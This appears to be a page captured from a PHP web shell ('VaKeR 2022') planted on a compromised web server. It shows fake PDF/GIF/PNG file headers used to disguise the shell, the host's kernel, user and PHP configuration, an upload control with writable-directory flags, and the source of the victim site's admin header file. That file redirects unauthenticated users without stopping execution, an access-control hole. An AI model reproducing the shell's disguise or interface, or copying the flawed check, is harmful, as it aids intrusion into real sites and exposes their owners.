%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/public_html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/public_html/admin/top.php
<?php
include "conn.php";
if(!isset($_SESSION['admin']))
{
header("location:index.php");
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Admin</title>
<meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport">
<link rel="shortcut icon" href="img/favicon.png" />
<link rel="stylesheet" href="css/font-awesome.min.css">
<link rel="stylesheet" href="css/bootstrap.min.css">
<link rel="stylesheet" href="css/style.css">
<link rel="stylesheet" href="css/dataTables.bootstrap.min.css">
 <link rel="stylesheet" href="css/app.css" />
<style>

.selectBox {
  position: relative;
}
.labelsize{
	font-size: 14px;
    font-weight: 400;
}

.selectBox select {
  width: 100%;

}

.overSelect {
  position: absolute;
  left: 0;
  right: 0;
  top: 0;
  bottom: 0;
}

#checkboxes {
  display: none;
  border: 1px #dadada solid;
}

#checkboxes label {
  display: block;
}

#checkboxes label:hover {

}
#checkboxes1 {
  display: none;
  border: 1px #dadada solid;
}

#checkboxes1 label {
  display: block;
}

#checkboxes1 label:hover {
  background-color: #1e90ff;
}
#checkboxes2 {
  display: none;
  border: 1px #dadada solid;
}

#checkboxes2 label {
  display: block;
}

#checkboxes2 label:hover {
  background-color: #1e90ff;
}
#checkboxes3 {
  display: none;
  border: 1px #dadada solid;
}

#checkboxes3 label {
  display: block;
}

#checkboxes3 label:hover {
  background-color: #1e90ff;
}


    </style>
</head>
<body class="sidebar-mini">
<div class="wrapper boxed-wrapper">
<header class="main-header">
<a href="index.php" class="logo blue-bg">
<span class="logo-lg"><img src="../img/mainlogo.png" alt=""></span> </a>
<nav class="navbar blue-bg navbar-static-top">
<ul class="nav navbar-nav pull-left">
<li><a class="sidebar-toggle" data-toggle="push-menu" href="#"></a> </li>
</ul>
<div class="navbar-custom-menu">
<ul class="nav navbar-nav">
<li class="dropdown user user-menu p-ph-res"> <a href="#" class="dropdown-toggle" data-toggle="dropdown"> <img src="img/thumb.jpg" class="user-image" alt="User Image"> <span class="hidden-xs">Admin</span> </a>
<ul class="dropdown-menu">
<li><a href="setting.php"><i class="fa fa-cog"></i> Account Setting</a></li>
<li><a href="logout.php"><i class="fa fa-power-off"></i> Logout</a></li>
</ul>
</li>
</ul>
</div>
</nav>
</header>

<aside class="main-sidebar">
<section class="sidebar">
<ul class="sidebar-menu" data-widget="tree">
<li><a href="dashboard.php">dashboard</a></li>
<!--<li><a href="state.php">State</a></li>-->
<li><a href="cities.php">cities</a></li>
<li><a href="treatments.php">treatments</a></li>
<li><a href="centres.php">centres</a></li>
<li><a href="homelisting.php">Home Listing</a></li>
<li><a href="citybanner.php">City Banner</a></li>
<li><a href="leads.php">leads</a></li>
<!--<li><a href="orders.php">orders</a></li>
<!--<li><a href="payments.php">payments</a></li>-->
<li><a href="faq.php">Faq</a></li>
<li><a href="setting.php">Setting</a></li>
<li><a href="logout.php">Logout</a></li>
</ul>
</section>
</aside>

VaKeR 2022